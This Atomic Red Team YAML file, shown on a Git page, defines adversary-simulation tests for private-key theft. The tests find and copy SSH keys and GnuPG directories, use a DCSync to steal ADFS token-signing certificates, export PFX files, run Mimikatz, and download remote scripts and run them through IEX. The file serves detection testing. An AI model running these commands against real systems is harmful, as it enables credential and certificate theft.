adam/atomic-red-team-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
62a85c12b51a6d903a8357cb91b555ff1b203fd3
atomic-red-team-gs/atomics/T1552.004/T1552.004.yaml
T
Hare Sudhan 62a85c12b5 FreeBSD changes (#2585) 
* freebsd changes

* renaming freebsd to linux
2023-11-06 17:41:43 -05:00

402 lines
17 KiB
YAML
Raw Blame History

attack_technique: T1552.004
display_name: 'Unsecured Credentials: Private Keys'
atomic_tests:
- name: Private Keys
auto_generated_guid: 520ce462-7ca7-441e-b5a5-f8347f632696
description: |
Find private keys on the Windows file system.
File extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, pfx, .cer, .p7b, .asc
supported_platforms:
- windows
executor:
command: |
dir c:\ /b /s .key | findstr /e .key
name: command_prompt
elevation_required: true
- name: Discover Private SSH Keys
auto_generated_guid: 46959285-906d-40fa-9437-5a439accd878
description: |
Discover private SSH keys on a FreeBSD, macOS or Linux system.
supported_platforms:
- linux
- macos
input_arguments:
search_path:
description: Path where to start searching from.
type: path
default: /
output_file:
description: Output file containing locations of SSH key files
type: path
default: /tmp/keyfile_locations.txt
executor:
command: |
find #{search_path} -name id_rsa 2>/dev/null >> #{output_file}
exit 0
cleanup_command: |
rm #{output_file}
name: sh
- name: Copy Private SSH Keys with CP
auto_generated_guid: 7c247dc7-5128-4643-907b-73a76d9135c3
description: |
Copy private SSH keys on a Linux system to a staging folder using the `cp` command.
supported_platforms:
- linux
input_arguments:
search_path:
description: Path where to start searching from.
type: path
default: /
output_folder:
description: Output folder containing copies of SSH private key files
type: path
default: /tmp/art-staging
executor:
command: |
mkdir #{output_folder}
find #{search_path} -name id_rsa 2>/dev/null -exec cp --parents {} #{output_folder} \;
exit 0
cleanup_command: |
rm -rf #{output_folder}
name: sh
- name: Copy Private SSH Keys with CP (freebsd)
auto_generated_guid: 12e4a260-a7fd-4ed8-bf18-1a28c1395775
description: |
Copy private SSH keys on a FreeBSD system to a staging folder using the `cp` command.
supported_platforms:
- linux
input_arguments:
search_path:
description: Path where to start searching from.
type: path
default: /
output_folder:
description: Output folder containing copies of SSH private key files
type: path
default: /tmp/art-staging
dependency_executor_name: sh
dependencies:
- description: |
Install GNU cp from coreutils package.
prereq_command: |
if [ ! -x "$(command -v gcp)" ]; then exit 1; else exit 0; fi;
get_prereq_command: |
(which pkg && pkg install -y coreutils)
executor:
command: |
mkdir #{output_folder}
find #{search_path} -name id_rsa 2>/dev/null -exec gcp --parents {} #{output_folder} \;
cleanup_command: |
rm -rf #{output_folder}
name: sh
- name: Copy Private SSH Keys with rsync
auto_generated_guid: 864bb0b2-6bb5-489a-b43b-a77b3a16d68a
description: |
Copy private SSH keys on a Linux or macOS system to a staging folder using the `rsync` command.
supported_platforms:
- macos
- linux
input_arguments:
search_path:
description: Path where to start searching from.
type: path
default: /
output_folder:
description: Output folder containing copies of SSH private key files
type: path
default: /tmp/art-staging
executor:
command: |
mkdir #{output_folder}
find #{search_path} -name id_rsa 2>/dev/null -exec rsync -R {} #{output_folder} \;
exit 0
cleanup_command: |
rm -rf #{output_folder}
name: sh
- name: Copy Private SSH Keys with rsync (freebsd)
auto_generated_guid: 922b1080-0b95-42b0-9585-b9a5ea0af044
description: |
Copy private SSH keys on a FreeBSD system to a staging folder using the `rsync` command.
supported_platforms:
- linux
input_arguments:
search_path:
description: Path where to start searching from.
type: path
default: /
output_folder:
description: Output folder containing copies of SSH private key files
type: path
default: /tmp/art-staging
dependency_executor_name: sh
dependencies:
- description: |
Check if rsync is installed.
prereq_command: |
if [ ! -x "$(command -v rsync)" ]; then exit 1; else exit 0; fi;
get_prereq_command: |
(which pkg && pkg install -y rsync)
executor:
command: |
mkdir #{output_folder}
find #{search_path} -name id_rsa 2>/dev/null -exec rsync -R {} #{output_folder} \;
cleanup_command: |
rm -rf #{output_folder}
name: sh
- name: Copy the users GnuPG directory with rsync
auto_generated_guid: 2a5a0601-f5fb-4e2e-aa09-73282ae6afca
description: |
Copy the users GnuPG (.gnupg) directory on a Mac or Linux system to a staging folder using the `rsync` command.
supported_platforms:
- macos
- linux
input_arguments:
search_path:
description: Path where to start searching from
type: path
default: /
output_folder:
description: Output folder containing a copy of the .gnupg directory
type: path
default: /tmp/GnuPG
executor:
command: |
mkdir #{output_folder}
find #{search_path} -type d -name '.gnupg' 2>/dev/null -exec rsync -Rr {} #{output_folder} \;
exit 0
cleanup_command: |
rm -rf #{output_folder}
name: sh
- name: Copy the users GnuPG directory with rsync (freebsd)
auto_generated_guid: b05ac39b-515f-48e9-88e9-2f141b5bcad0
description: |
Copy the users GnuPG (.gnupg) directory on a FreeBSD system to a staging folder using the `rsync` command.
supported_platforms:
- linux
input_arguments:
search_path:
description: Path where to start searching from
type: path
default: /
output_folder:
description: Output folder containing a copy of the .gnupg directory
type: path
default: /tmp/GnuPG
dependency_executor_name: sh
dependencies:
- description: |
Check if rsync is installed.
prereq_command: |
if [ ! -x "$(command -v rsync)" ]; then exit 1; else exit 0; fi;
get_prereq_command: |
(which pkg && pkg install -y rsync)
executor:
command: |
mkdir #{output_folder}
find #{search_path} -type d -name '.gnupg' 2>/dev/null -exec rsync -Rr {} #{output_folder} \;
cleanup_command: |
rm -rf #{output_folder}
name: sh
- name: ADFS token signing and encryption certificates theft - Local
auto_generated_guid: 78e95057-d429-4e66-8f82-0f060c1ac96f
description: |
Retrieve ADFS token signing and encrypting certificates. This is a precursor to the Golden SAML attack (T1606.002). You must be signed in as Administrator on an ADFS server.
Based on https://o365blog.com/post/adfs/ and https://github.com/fireeye/ADFSDump.
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: |
AADInternals module must be installed.
prereq_command: |
if (Get-Module AADInternals) {exit 0} else {exit 1}
get_prereq_command: |
Install-Module -Name AADInternals -Force
executor:
command: |
Import-Module AADInternals -Force
Export-AADIntADFSCertificates
Get-ChildItem | Where-Object {$_ -like "ADFS*"}
Write-Host "`nCertificates retrieved successfully"
cleanup_command: |
Remove-Item -Path ".\ADFS_encryption.pfx" -ErrorAction Ignore
Remove-Item -Path ".\ADFS_signing.pfx" -ErrorAction Ignore
name: powershell
- name: ADFS token signing and encryption certificates theft - Remote
auto_generated_guid: cab413d8-9e4a-4b8d-9b84-c985bd73a442
description: |
Retrieve ADFS token signing and encrypting certificates. This is a precursor to the Golden SAML attack (T1606.002). You must be signed in as a Domain Administrators user on a domain-joined computer.
Based on https://o365blog.com/post/adfs/ and https://github.com/fireeye/ADFSDump.
supported_platforms:
- windows
input_arguments:
adfs_service_account_name:
description: Name of the ADFS service account
type: string
default: "adfs_svc"
replication_user:
description: Username with replication rights. It can be the Domain Admin running the script
type: string
default: "Administrator"
replication_password:
description: Password of replication_username
type: string
default: "ReallyStrongPassword"
adfs_server_name:
description: Name of an ADFS server
type: string
default: "sts.contoso.com"
dependency_executor_name: powershell
dependencies:
- description: |
AADInternals and ActiveDirectory modules must be installed.
prereq_command: |
if ($(Get-Module AADInternals) -or $(Get-Module -ListAvailable -Name ActiveDirectory)) {echo 0} else {echo 1}
get_prereq_command: |
Install-Module -Name AADInternals -Force
executor:
command: |
Import-Module ActiveDirectory -Force
Import-Module AADInternals -Force | Out-Null
#Get Configuration
$dcServerName = (Get-ADDomainController).HostName
$svc = Get-ADObject -filter * -Properties objectguid,objectsid | Where-Object name -eq "#{adfs_service_account_name}"
$PWord = ConvertTo-SecureString -String "#{replication_password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{replication_user}, $PWord
# use DCSync to fetch the ADFS service account's NT hash
$hash = Get-AADIntADUserNTHash -ObjectGuid $svc.ObjectGuid -Credentials $Credential -Server $dcServerName -AsHex
$ADFSConfig = Export-AADIntADFSConfiguration -Hash $hash -SID $svc.Objectsid.Value -Server #{adfs_server_name}
# Get certificates decryption key
$Configuration = [xml]$ADFSConfig
$group = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.Group
$container = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ContainerName
$parent = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ParentContainerDn
$base = "LDAP://CN=$group,$container,$parent"
$ADSearch = [System.DirectoryServices.DirectorySearcher]::new([System.DirectoryServices.DirectoryEntry]::new($base))
$ADSearch.Filter = '(name=CryptoPolicy)'
$ADSearch.PropertiesToLoad.Clear()
$ADSearch.PropertiesToLoad.Add("displayName") | Out-Null
$aduser = $ADSearch.FindOne()
$keyObjectGuid = $ADUser.Properties["displayName"]
$ADSearch.PropertiesToLoad.Clear()
$ADSearch.PropertiesToLoad.Add("thumbnailphoto") | Out-Null
$ADSearch.Filter="(l=$keyObjectGuid)"
$aduser=$ADSearch.FindOne()
$key=[byte[]]$aduser.Properties["thumbnailphoto"][0]
# Get encrypted certificates from configuration and decrypt them
Export-AADIntADFSCertificates -Configuration $ADFSConfig -Key $key
Get-ChildItem | Where-Object {$_ -like "ADFS*"}
Write-Host "`nCertificates retrieved successfully"
cleanup_command: |
Remove-Item -Path ".\ADFS_encryption.pfx" -ErrorAction Ignore
Remove-Item -Path ".\ADFS_signing.pfx" -ErrorAction Ignore
name: powershell
- name: CertUtil ExportPFX
auto_generated_guid: 336b25bf-4514-4684-8924-474974f28137
description: |
The following Atomic test simulates adding a generic non-malicious certificate to the Root certificate store. This behavior generates a registry modification that adds the cloned root CA certificate in the keys outlined in the blog. In addition, this Atomic utilizes CertUtil to export the PFX (ExportPFX), similar to what was seen in the Golden SAML attack.
Keys will look like - \SystemCertificates\CA\Certificates or \SystemCertificates\Root\Certificates
Reference: https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
Reference: https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html
supported_platforms:
- windows
input_arguments:
output:
description: file path to export to
type: path
default: c:\temp\atomic.pfx
password:
description: password for cert
type: string
default: password
executor:
command: |
IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1' -UseBasicParsing)
certutil.exe -p #{password} -exportPFX Root 1F3D38F280635F275BE92B87CF83E40E40458400 #{output}
cleanup_command: |
Get-ChildItem -Path Cert:\ -Recurse | Where-Object { $_.Thumbprint -eq '1F3D38F280635F275BE92B87CF83E40E40458400' } | remove-item
name: powershell
elevation_required: true
- name: Export Root Certificate with Export-PFXCertificate
auto_generated_guid: 7617f689-bbd8-44bc-adcd-6f8968897848
description: |
Creates a Root certificate and exports it with Export-PFXCertificate PowerShell Cmdlet.
Upon a successful attempt, this will write a pfx to disk and utilize the Cmdlet Export-PFXCertificate.
supported_platforms:
- windows
input_arguments:
pfx_path:
description: output path of the certificate
type: string
default: $env:Temp\atomicredteam.pfx
executor:
command: |
$mypwd = ConvertTo-SecureString -String "AtomicRedTeam" -Force -AsPlainText
$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My
Set-Location Cert:\LocalMachine\My
Get-ChildItem -Path $cert.Thumbprint | Export-PfxCertificate -FilePath #{pfx_path} -Password $mypwd
cleanup_command: |
try {
$cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My
Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
} catch { }
name: powershell
elevation_required: true
- name: Export Root Certificate with Export-Certificate
auto_generated_guid: 78b274f8-acb0-428b-b1f7-7b0d0e73330a
description: |
Creates a Root certificate and exports it with Export-Certificate PowerShell Cmdlet.
Upon a successful attempt, this will write a pfx to disk and utilize the Cmdlet Export-Certificate.
supported_platforms:
- windows
input_arguments:
pfx_path:
description: Path of the certificate
type: path
default: $env:Temp\AtomicRedTeam.cer
executor:
command: |
$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My
Set-Location Cert:\LocalMachine\My
Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path}
cleanup_command: |
try {
$cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My -ErrorAction Ignore
Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
}
catch { }
name: powershell
elevation_required: true
- name: Export Certificates with Mimikatz
auto_generated_guid: 290df60e-4b5d-4a5e-b0c7-dc5348ea0c86
description: |
The following Atomic test will utilize Mimikatz to extract the certificates from the local system My store. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands.
A successful attempt will stdout the certificates and write multiple .pfx and .der files to disk.
supported_platforms:
- windows
input_arguments:
mimikatz_exe:
description: Path of the Mimikatz binary
type: string
default: PathToAtomicsFolder\..\ExternalPayloads\x64\mimikatz.exe
dependency_executor_name: powershell
dependencies:
- description: |
Mimikatz must exist on disk at specified location (#{mimikatz_exe})
prereq_command: |
if (Test-Path "#{mimikatz_exe}") {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
$releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases"
$zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") }
$basePath = Split-Path "#{mimikatz_exe}" | Split-Path
Invoke-FetchFromZip $zipUrl "x64/mimikatz.exe" $basePath
executor:
command: |
"#{mimikatz_exe}" "crypto::certificates /systemstore:local_machine /store:my /export" exit
name: command_prompt
elevation_required: true
Reference in New Issue View Git Blame Copy Permalink